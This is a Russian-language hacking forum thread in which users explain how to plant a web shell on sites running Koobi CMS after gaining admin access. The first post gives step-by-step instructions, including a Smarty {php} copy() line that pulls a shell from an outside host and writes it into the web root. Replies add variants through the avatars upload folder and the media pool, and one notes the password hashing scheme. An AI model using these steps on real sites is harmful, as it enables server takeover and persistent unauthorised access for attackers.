заливка шела через Koobi CMS

Discussion in 'Веб-уязвимости' started by vp$, 17 Feb 2008.

  1. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    получив доступ к админке движка Koobi CMS я задался вопросом как же все таки залить шел на сервер, поиск в гугле абсолютно ничего дал. я решил сам изучить админку и через пол часа я уже лазил по серваку, как говорится "все гениальное-просто"

    заходим в админку
    http://www.saitik.com/admin/admin.php

    и на администраторской панели выбираем
    Статические страницы>Создать документ
    заполняем появившуюся форму
    Категория -- необязательно
    Название -- shell
    Имя документа -- shell
    текст документа
    Code:
    {php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/config.php'); {/php}
    где shell - любое слово,
    http://hakersite.net/shel.txt - путь до шела в текстовом файле
    /home/public_html/saitik.com/config.php - путь для записи шела /* может быть и таким ./config.php , если прав хватит*/

    теперь нужно заставить сервер выполнить эту команду
    http://www.saitik.com/index.php?area=1&p=static&page=shell

    ну вот и все в принципе, можем с чистой совестью зайти на шел
    http://www.saitik.com/config.php

    зЫ: удачи в хаке!
     
    6 people like this.
  2. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    хм... а если папка /static/ закрыта на запись?
    Тогда поступаем так: в админке выбераем меню: Файлы->Добавить файл в архив сайта
    там нажимаем кнопку "Медиа каталог" или "Каталог загрузок", на открывшейся странице выбираем папку "avatars", нажимаем "Загрузка файлов" - загружаем шелл типа shell.php.
    При Удачном раскладе(если файл загрузки не фильтрует файлы php) шелл будет доступен по адресу: http://site/uploads/avatars/shell.php

    ЗЫ: в случае заливки шелла способом, представленным vp$ лучше заменить
    Code:
    {php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/config.php'); {/php}
    на
    Code:
    {php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/uploads/avatars/config.php'); {/php}
    Т.к. корневая директория может быть закрыта на запись - а папка с аватарками обычно открыта
     
    1 person likes this.
  3. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    Dr.Frank, как-то ты запутано написал.. =\ я хз, туда попал, где ты говорил (язык не совcем RU or ENG) но одним словом открываем /admin/mediapool.php?typ=bild&target=images и грузим свое добро.

    напомню, что хешируется пасс md5(md5()).
     
    _________________________